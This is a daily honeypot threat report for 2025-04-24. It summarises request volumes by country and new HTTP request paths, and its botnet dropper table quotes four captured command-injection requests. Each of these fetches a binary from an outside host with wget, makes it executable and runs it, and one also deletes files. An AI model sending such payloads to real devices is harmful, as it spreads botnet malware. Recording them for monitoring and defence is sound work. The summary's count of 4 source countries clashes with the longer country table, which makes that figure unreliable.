Daily Report: 2025-04-24#
Executive summary#
interaction report on http service of various Hhoneypot around the world.
- Executive summary
- OT report simplified
- Botnet dropper behaviour
- List of request
- List of country_iso_code
executive_summary#
In today’s repport, we detected 4 stage 1 IP address(es), linked to 4 dropper URL(s).
There are 10 new requests that have never been observed before (these were added to the monitored request database.).
A total of 1994 requests were recorded during the day, originating from 4 different countries, with a peak of 496 requests coming from GB.
ot_simplified_report#
simplified report for medium-level interactions with honeypots that mimic industrial systems (web site loading, or interactions with the website), for more contact us on social@shoggoth.industries.
source_country | targeted_country |
---|---|
US | Dubai |
GB | Georgia |
botnet_dropper_behaviour#
remote_addr | request |
---|---|
139.5.10.75 | 27;wget%20http://%s:%d/Mozi.m%20-O%20->%20/tmp/Mozi.m;chmod%20777%20/tmp/Mozi.m;/tmp/Mozi.m%20dlink.mips%27$ HTTP/1.0 |
124.220.11.157 | GET /shell?cd%20%2Ftmp%3B%20wget%20http%3A%2F%2F45.95.147.201%2Fbins%2Farm7%3B%20chmod%20777%20arm7%3B%20.%2Farm7%20jaws%3B HTTP/1.1\x5Cr\x5CnUser-Agent: Mozila/5.0\x5Cr\x5CnHost: 127.0.0.1:80\x5Cr\x5CnAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8\x5Cr\x5CnConnection: keep-alive\x5Cr\x5Cn\x5Cr\x5Cn\x11 |
8.152.208.190 | GET /shell?cd+/tmp;rm+-rf+*;wget+ 45.90.162.234/wdjkalwww/telnet.arm5;chmod+777+/tmp/telnet.arm5;sh+/tmp/telnet.arm5 HTTP/1.1 |
5.183.209.244 | POST /device.rsp?opt=sys&cmd=S_O_S_T_R_E_A_MAX&mdb=sos&mdc=cd%20%2Ftmp%3Brm%20arm7%3B%20wget%20http%3A%2F%2F212.18.104.182%2Farm7%3B%20chmod%20777%20%2A%3B%20.%2Farm7%20tbk HTTP/1.1 |
request#
The list of requests presented here are those that have not yet been yet integrated into the request database.
number_of_occurence | request | |
---|---|---|
31 | 6 | POST /show HTTP/1.1 |
159 | 2 | GET /admin.php?520 HTTP/1.1 |
214 | 1 | GET /pmd/index.php HTTP/1.1 |
223 | 1 | POST /api/v1/validate/code HTTP/1.1 |
233 | 1 | GET /odinhttpcall1745486121 HTTP/1.1 |
234 | 1 | GET /OdinHttpCall1745486121 HTTP/1.1 |
235 | 1 | GET /Odin/http/call1745486121 HTTP/1.1 |
307 | 1 | GET /OdinHttpCall1745523802 HTTP/1.1 |
308 | 1 | GET /Odin/http/call1745523802 HTTP/1.1 |
338 | 1 | GET /odinhttpcall1745523802 HTTP/1.1 |
country_iso_code#
number_of_occurence | country_iso_code | |
---|---|---|
0 | 496 | GB |
1 | 344 | NL |
2 | 307 | US |
3 | 154 | SC |
4 | 132 | BG |
5 | 101 | DE |
6 | 94 | PL |
7 | 61 | KR |
8 | 45 | CN |
9 | 37 | RU |
10 | 34 | HK |
11 | 23 | IN |
12 | 15 | SG |
13 | 15 | CA |
14 | 12 | CH |
15 | 11 | ZA |
16 | 11 | AU |
17 | 10 | AO |
18 | 10 | TR |
19 | 9 | VN |
20 | 8 | BE |
21 | 7 | FR |
22 | 6 | LT |
23 | 6 | SE |
24 | 6 | IL |
25 | 5 | BR |
26 | 4 | MD |
27 | 4 | KW |
28 | 3 | GH |
29 | 3 | IT |
30 | 3 | PT |
31 | 2 | IR |
32 | 2 | VE |
33 | 2 | ID |
34 | 2 | JP |
35 | 2 | UA |
36 | 1 | CZ |
37 | 1 | AE |
38 | 1 | PH |
39 | 1 | AL |
40 | 1 | RO |
41 | 1 | NP |
42 | 1 | AR |
43 | 1 | PA |